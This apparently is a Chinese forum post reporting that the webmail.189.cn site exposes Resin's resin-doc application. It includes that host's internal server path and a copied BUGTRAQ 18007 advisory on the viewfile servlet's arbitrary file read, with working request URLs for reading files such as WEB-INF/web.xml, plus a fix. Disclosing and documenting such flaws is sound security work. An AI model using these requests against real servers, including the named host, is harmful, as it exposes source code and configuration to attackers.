webmail.189.cn 问题
http://webmail.189.cn/resin-doc/ ... ehomemail_index.jsp
http://webmail.189.cn/resin-doc/ ... end=#code-highlight
/opt/hermes/resin_webmail_80/webapps/resin-doc/index.jspre-marker=re-start=re-end=
http://webmail.189.cn/resin-doc/
受影响系统:
Caucho Technology Resin v3.0.18
Caucho Technology Resin v3.0.17
Caucho Technology Resin v3.0.16
Caucho Technology Resin v3.0.15
Caucho Technology Resin v3.0.14
Caucho Technology Resin v3.0.13
Caucho Technology Resin v3.0.12
Caucho Technology Resin v3.0.11
Caucho Technology Resin v3.0.10
不受影响系统:
Caucho Technology Resin v3.0.19
描述:BUGTRAQ ID: 18007
Resin是一款由Caucho Technology开发的WEB服务器,可使用在Microsoft Windows操作系统下。
Resin的某个CGI程序实现上存在输入验证漏洞,远程攻击者可能利用此漏洞读取Web主目录下的任意文件,包括JSP源码或类文件。
默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet:
viewfile servlet可以无需参数在Web主目录中浏览任意文件:
http://targetsystem/resin-doc/viewfile/?file=index.jsp
攻击者可以设置resin-doc外的上下文路径,读取其他Web主目录的任意文件:
http://targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml
如果系统中安装了resin-doc就可能读取Web主目录中的所有文件,包括类文件,然后可以反编译这些文件浏览Java源代码:
请求中错误的路径还会泄漏安装的绝对路径:
File not found
/C:/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-existant.class
<*来源:Joseph Pierini ([email]joep@scanalert.com[/email])
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114780293620632&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml
建议:临时解决方法:
* 从生产系统中删除resin-doc.war文件,不要使用默认的配置文件部署。